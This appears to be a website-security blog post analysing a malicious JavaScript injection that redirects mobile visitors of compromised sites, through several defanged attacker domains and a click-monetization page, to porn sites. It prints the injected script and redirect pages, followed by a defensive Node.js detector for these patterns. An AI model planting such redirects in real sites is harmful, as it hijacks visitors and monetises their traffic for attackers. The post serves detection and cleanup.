Attackers will do desperate and obvious things to boost the views of their ‘customers’.
On a daily basis we find different malicious redirects (some are very well hidden, others not so much).
This JavaScript redirect is not so different from the other malicious redirects out there, except for one thing: it is built from multiple redirects through multiple servers so that the attacker can gather statistics and monetize the ‘clicks’ from the scripts.
<script type="text/javascript">if (screen.width <= 480) {window.location = "hxxp://portal-b[.]pw/XcTyTp";}</script>
This is a simple JavaScript injection that redirects you to ‘Free porn web cams’ if your device's screen width is 480px or less. Most mobile phones will be affected.
The interesting part of this malicious redirect is that, on each execution, it redirects you to another website where another malicious script is hosted; from there you are redirected to the monetization platform, which redirects you to a random porn website.
hxxp://infectedsite[.]dom/wp-content/js/js.html (compromised website used as jump point to the below URL)
The content of the js.html is this:
<meta http-equiv="refresh" content="0;URL=hxxp://portal-b[.]pw/X9DC2z"/>
After the next redirect, the shortened URL sends you to a malicious click monetization website:
<html> <head> <meta http-equiv="REFRESH" content="1; URL='hxxp://click-cpa[.]net/out?zoneId=1466739-1466890'"> <script type="text/javascript">window.location = "hxxp://click-cpa[.]net/out?zoneId=1466739-1466890";</script> </head> </html>
And voila! You are redirected to a random porn website from their list, generating some cents for the attacker.
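As an added example (not code from the original post), the following Node.js code checks a page's HTML for the two redirect shapes in this chain: an inline script that assigns `location` inside a `screen.width` test, and a meta refresh that points at another host. The function names, the `.example` hosts and the sample pages are assumptions constructed for illustration.

```javascript
// Added example: flags the two redirect shapes shown in this post.
// All hosts under .example are constructed placeholders.

// Hostname of an absolute http(s) URL; null for relative or unparsable ones.
function hostOf(url) {
  try {
    const u = new URL(url);
    return /^https?:$/.test(u.protocol) ? u.hostname.toLowerCase() : null;
  } catch (e) {
    return null;
  }
}

// Scan HTML served by siteHost and return off-site redirect findings.
function findRedirects(html, siteHost) {
  const findings = [];
  const offSite = (url) => {
    const h = hostOf(url);
    return h !== null && h !== siteHost.toLowerCase();
  };

  // Shape 1: inline script assigning location inside a screen.width check.
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const loc = m[1].match(/\blocation(?:\.href)?\s*=\s*["']([^"']+)["']/);
    if (loc && /screen\.width\s*[<>]=?\s*\d+/.test(m[1]) && offSite(loc[1])) {
      findings.push({ type: "screen-width-redirect", target: loc[1] });
    }
  }

  // Shape 2: meta refresh whose URL points at another host.
  const metaRe = /<meta\b[^>]*http-equiv\s*=\s*["']?refresh\b[^>]*>/gi;
  for (const m of html.matchAll(metaRe)) {
    const c = m[0].match(/content\s*=\s*["']\s*(\d+)\s*;\s*url\s*=\s*["']?([^"'\s>]+)/i);
    if (c && offSite(c[2])) {
      findings.push({ type: "meta-refresh", delay: Number(c[1]), target: c[2] });
    }
  }
  return findings;
}

// Constructed samples modelled on the snippets above.
const infectedPage = '<script type="text/javascript">if (screen.width <= 480) ' +
  '{window.location = "http://redirector.example/abc123";}</script>';
const jumpPage = '<meta http-equiv="refresh" content="0;URL=http://redirector.example/abc123"/>';
const benignPage = '<script>if (screen.width <= 480) {window.location = "/m/";}</script>' +
  '<meta http-equiv="refresh" content="300;URL=/dashboard">';

console.log(findRedirects(infectedPage + jumpPage + benignPage, "blog.example"));
```

Same-host and relative targets are deliberately ignored, so a site's own mobile redirect or timed refresh does not show up as a finding.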
If your website has been infected and you need some help cleaning it up, please let us know.